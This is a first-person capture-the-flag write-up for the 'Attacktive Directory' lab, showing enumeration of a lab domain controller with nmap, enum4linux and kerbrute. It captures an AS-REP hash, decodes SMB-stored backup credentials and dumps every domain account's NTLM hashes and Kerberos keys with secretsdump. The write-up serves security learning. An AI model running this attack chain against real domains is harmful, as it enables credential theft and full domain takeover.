Attacktive Directory
Alright this seems like a good next step for my journey, I know AD is used everywhere, I've even used it myself a few times for OIDC auth in-front of cloud applications. But, I've never interfaced with it directly and I know this is something I'll need to know how to do - so let's get to it!
Installing Impacket
$ git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Cloning into '/opt/impacket'...
remote: Enumerating objects: 36, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 18881 (delta 14), reused 21 (delta 7), pack-reused 18845
Receiving objects: 100% (18881/18881), 6.26 MiB | 12.57 MiB/s, done.
Resolving deltas: 100% (14364/14364), done.
$ pip3 install -r /opt/impacket/requirements.txt
Ignoring pyreadline: markers 'sys_platform == "win32"' don\'t match your environment
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 2)) (1.15.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 3)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 4)) (3.9.7)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 5)) (20.0.1)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 6)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 7)) (0.9.3)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 8)) (1.1.2)
$ cd /opt/impacket/ && python3 ./setup.py install
... Installs ...
Enumerate the DC Pt. 1
Alright, I do know what DC is Domain Controller. At least I have that going for me! Well, It asks me to a popular enumation tool to reveal some information... To start I'm just going nmap this and see what's going on there:
# sudo nmap -n -Pn -p- --script vuln 10.10.203.98
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-03 10:50 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Stats: 0:13:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:04 (0:00:00 remaining)
Stats: 0:15:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Stats: 0:16:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Nmap scan report for 10.10.203.98
Host is up (0.12s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
|_sslv2-drown:
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_sslv2-drown:
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_sslv2-drown:
3389/tcp open ms-wbt-server
|_sslv2-drown:
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49673/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49679/tcp open unknown
49684/tcp open unknown
49696/tcp open unknown
49814/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 981.94 seconds
A quick search for how to enumerate windows AD, the first result is enum4linux which is the correct 1st answer.
Alright, I guess we should run that against the host then!
$ sudo enum4linux 10.10.203.98 255 ⨯
[sudo] password for kali:
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 3 10:52:23 2021
==========================
| Target Information |
==========================
Target ........... 10.10.203.98
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.203.98 |
====================================================
[E] Can\'t find workgroup/domain
============================================
| Nbtstat Information for 10.10.203.98 |
============================================
Looking up status of 10.10.203.98
No reply from 10.10.203.98
=====================================
| Session Check on 10.10.203.98 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.203.98 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
===========================================
| Getting domain SID for 10.10.203.98 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
======================================
| OS information on 10.10.203.98 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.203.98 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.203.98 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=============================
| Users on 10.10.203.98 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn\'t find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn\'t find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=========================================
| Share Enumeration on 10.10.203.98 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.203.98
====================================================
| Password Policy Information for 10.10.203.98 |
====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.203.98 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.203.98)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[E] Failed to get password policy with rpcclient
==============================
| Groups on 10.10.203.98 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.203.98 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
=============================================
| Getting printer info for 10.10.203.98 |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Mar 3 10:56:54 2021
Alright so most of the answers in this section were obvious from the default output, however I don't know why a top-level domain could cause issues... samba.org:
In this scenario you would name your domain in the format of "domain.invalid.tld" such as "SAMDOM.local". Using an invalid top-level domain (TLD) such as .local or .internal used to be a very common practice. In fact all versions of Microsoft's Small Business Servers were configured to use a domain in the form of "domain.local". Since the .local TLD is officially reserved by ICANN, you can also be assured that no external DNS server will resolve this domain. However this style of name has a few major issues:
The .local TLD is used by some zeroconf systems, most importantly Apple's Bonjour service. Using them together will not work correctly.
Invalid TLDs, such as .local or .internal, will soon be unable to get SSL certificates from any of the major certificate providers. The CA/Browser Forum has decided that no certificates should be issued for these invalid domains starting November 1, 2015. In fact, you are now unable to purchase a certificate for these names if they expire after this date. This includes Subject Alternative Names (SAN) used within otherwise valid certificates (this is a very common configuration for Microsoft Exchange). While internal certificate authorities have no such restriction, having this option open to you is always a good thing.
It is possible that the invalid TLD you are now using, could become a valid TLD in the future. While .local is reserved by ICANN, the TLD system is currently scheduled to undergo a vast expansion of the generic TLD (gTLD) it supports, from 22 to over a thousand new names. This trend is likely to continue.
For the same reason, names with other invalid TLDs should be avoided, including .internal and .lan
.local was the answer!
Enumerate the DC Pt. 2
We're being instructed to use kerbrute to brute-force with a given username/password list. I guess this one is for learning purposes, but this is pretty lame in my opinion. A pruned username/password list?! Sigh...
Install kerbrute
┌──(kali㉿kali)-[~/scripts]
└─$ go get github.com/ropnop/kerbrute 100 ⨯
┌──(kali㉿kali)-[~/scripts]
└─$ make all
make: *** No rule to make target 'all'. Stop.
┌──(kali㉿kali)-[~/scripts]
└─$ kerbrute 2 ⨯
zsh: command not found: kerbrute
┌──(kali㉿kali)-[~/scripts]
└─$ cd $GOPATH 127 ⨯
┌──(kali㉿kali)-[~]
└─$ ls
config Desktop Documents Downloads go Music peda Pictures Public result.txt scripts Templates test.sh tmp t.sh Videos vpn x.sh
┌──(kali㉿kali)-[~]
└─$ cd go
┌──(kali㉿kali)-[~/go]
└─$ cd src
┌──(kali㉿kali)-[~/go/src]
└─$ ls
github.com golang.org
┌──(kali㉿kali)-[~/go/src]
└─$ cd github.com
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ ls
hashicorp jcmturner op ropnop spf13
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ cd ropnop
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ ls
gokrb5 kerbrute
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ cd kerbrute
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ mnake all
zsh: command not found: mnake
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ make all 127 ⨯
go: downloading github.com/op/go-logging v0.0.0-20160315200505-970db520ece7
go: downloading github.com/ropnop/gokrb5/v8 v8.0.0-20201111231119-729746023c02
go: downloading github.com/spf13/cobra v1.1.1
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/jcmturner/gofork v1.0.0
go: downloading github.com/jcmturner/dnsutils/v2 v2.0.0
go: downloading golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897
go: downloading github.com/jcmturner/rpc/v2 v2.0.2
go: downloading github.com/jcmturner/aescts/v2 v2.0.0
go: downloading github.com/hashicorp/go-uuid v1.0.2
go: downloading golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
cd /home/kali/go/src/github.com/ropnop/kerbrute
rm -f kerbrute kerbrute.exe kerbrute.test kerbrute.test.exe main main.exe
rm -f /home/kali/go/bin/kerbrute
Done.
Building for windows amd64..
go: downloading github.com/inconshreveable/mousetrap v1.0.0
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
cmd/go: unsupported GOOS/GOARCH pair darwin/386
make: *** [Makefile:42: mac] Error 1
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kernbrute 2 ⨯
zsh: command not found: kernbrute
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kerbrute 127 ⨯
zsh: command not found: kerbrute
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ ls 127 ⨯
cmd dist go.mod go.sum LICENSE main.go Makefile README.md session util
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ cd dist
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls
kerbrute_darwin_amd64 kerbrute_linux_386 kerbrute_linux_amd64 kerbrute_windows_386.exe kerbrute_windows_amd64.exe
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ kernel-install
Not enough arguments
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls -al 1 ⨯
total 37300
drwxr-xr-x 2 kali kali 4096 Mar 3 11:37 .
drwxr-xr-x 8 kali kali 4096 Mar 3 11:37 ..
-rwxr-xr-x 1 kali kali 7988312 Mar 3 11:37 kerbrute_darwin_amd64
-rwxr-xr-x 1 kali kali 7018814 Mar 3 11:37 kerbrute_linux_386
-rwxr-xr-x 1 kali kali 8153622 Mar 3 11:37 kerbrute_linux_amd64
-rwxr-xr-x 1 kali kali 7028736 Mar 3 11:37 kerbrute_windows_386.exe
-rwxr-xr-x 1 kali kali 7991296 Mar 3 11:37 kerbrute_windows_amd64.exe
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ./kerbrute_linux_amd64
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user\'s password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
--downgrade Force downgraded encryption type (arcfour-hmac-md5)
--hash-file string File to save AS-REP hashes to (if any captured), otherwise just logged
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ mv ./kerbrute_linux_amd64 /usr/bin/kerbrute
mv: cannot move './kerbrute_linux_amd64' to '/usr/bin/kerbrute': Permission denied
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo !! 1 ⨯
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo mv ./kerbrute_linux_amd64 /usr/bin/kerbrute 1 ⨯
[sudo] password for kali:
$ cd ~ && which kerbrute
/usr/bin/kerbrute
Download the wordlists
$ cd ~ && mkdir tmp && cd tmp
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
$ ls -al
total 1292
drwxr-xr-x 2 kali kali 4096 Mar 3 11:40 .
drwxr-xr-x 30 kali kali 4096 Mar 3 11:39 ..
-rw-r--r-- 1 kali kali 569236 Mar 3 11:40 passwordlist.txt
-rw-r--r-- 1 kali kali 744407 Mar 3 11:40 userlist.txt
$ kerbrute userenum --dc 10.10.203.98 -d THM-AD ./userlist.txt 1 ⨯
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop
2021/03/03 11:43:03 > Using KDC(s):
2021/03/03 11:43:03 > 10.10.203.98:88
2021/03/03 11:43:03 > [+] VALID USERNAME: james@THM-AD
2021/03/03 11:43:05 > [+] svc-admin has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$svc-admin@SPOOKYSEC.LOCAL:4715c0c49c0041ef374f45ed323315fd$b5ffae20417b39577f4f70fffb86280df075b8a030927c7e662d83cac8bb309fbc3f771eb77f0816cd379be1362cca367132befeee1d08f51d074e48bfc8e693c4d0096b7ed49e29e28a6d7b63b500d840c5681f4f6bb6e3c874f7fb11c3a0c28e924624298eb609b5c696541414b13d9eb15850fbe6b30ca1379a504694b1ccd847c31576c80cbc71db45263c4b492bd6d1ece1387d45540f47d8ab6ed8adb6b77c17d732c9183faa8a278f34dfb4da2e25df78ee55c819a4ad1cb2b702038f9adb7d0afe7222925d98b7f7ce6c4f53f7f432051133420748315c026d908834d3c1f70deb1388d6693d9eec271a16e25a48d8822eb458522560c25199
2021/03/03 11:43:05 > [+] VALID USERNAME: svc-admin@THM-AD
2021/03/03 11:43:07 > [+] VALID USERNAME: James@THM-AD
2021/03/03 11:43:08 > [+] VALID USERNAME: robin@THM-AD
2021/03/03 11:43:16 > [+] VALID USERNAME: darkstar@THM-AD
2021/03/03 11:43:22 > [+] VALID USERNAME: administrator@THM-AD
2021/03/03 11:43:33 > [+] VALID USERNAME: backup@THM-AD
2021/03/03 11:43:38 > [+] VALID USERNAME: paradox@THM-AD
2021/03/03 11:44:10 > [+] VALID USERNAME: JAMES@THM-AD
2021/03/03 11:44:21 > [+] VALID USERNAME: Robin@THM-AD
2021/03/03 11:45:23 > [+] VALID USERNAME: Administrator@THM-AD
Alright time to crack that hash, I switched over to my Windows Host that can use my GPU:
C:\Users\matth\Desktop\Security\cracking\hashcat-6.1.1\hashcat-6.1.1>hashcat.exe -m 18200 -a 0 -o result.txt ..\..\hashes\1.txt ..\..\wordlist\1.txt
hashcat (v6.1.1) starting...
* Device #1: CUDA SDK Toolkit installation NOT detected.
CUDA SDK Toolkit installation required for proper device support and utilization
Falling back to OpenCL Runtime
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.2.109) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: GeForce RTX 2080 Ti, 9664/11264 MB (2816 MB allocatable), 68MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1169 MB
Dictionary cache built:
* Filename..: ..\..\wordlist\1.txt
* Passwords.: 70188
* Bytes.....: 639424
* Keyspace..: 70188
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:4715c0c49c0...c25199
Time.Started.....: Wed Mar 03 12:08:15 2021 (1 sec)
Time.Estimated...: Wed Mar 03 12:08:16 2021 (0 secs)
Guess.Base.......: File (..\..\wordlist\1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 56258.4 kH/s (0.38ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 70188/70188 (100.00%)
Rejected.........: 0/70188 (0.00%)
Restore.Point....: 70188/70188 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> pinkk
Hardware.Mon.#1..: Temp: 36c Fan: 0% Util: 48% Core:1965MHz Mem:6800MHz Bus:16
Started: Wed Mar 03 12:08:14 2021
Stopped: Wed Mar 03 12:08:16 2021
Enumerate DC Pt. 3
Now we're told to enumerate smb shares with our known account... We're going to use smbclient to poke around real quick:
# List shares
$ smbclient -U svc-admin -L ///10.10.204.111 1 ⨯
Enter WORKGROUP\svc-admin\'s password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
# Poke at shares
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\ADMIN -U svc-admin 1 ⨯
Enter WORKGROUP\svc-admin\'s password:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\backup -U svc-admin 1 ⨯
Enter WORKGROUP\svc-admin\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3548545 blocks availabl
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/tmp]
└─$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
┌──(kali㉿kali)-[~/tmp]
└─$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 --decode
backup@spookysec.local:backup2517860
Elevating Privileges
We're told to use secretsdump.py from IMPACKET to get password hashes using the credentials we found. Cool. (I hate these tutorial boxes I'm never doing one again, I enjoy the exploration... this feels like cheating...) Anyway...
$ secretsdump.py backup:backup2517860@10.10.204.111
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:e3d0f4e53b0fce2073a2ef33f2d075ca:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
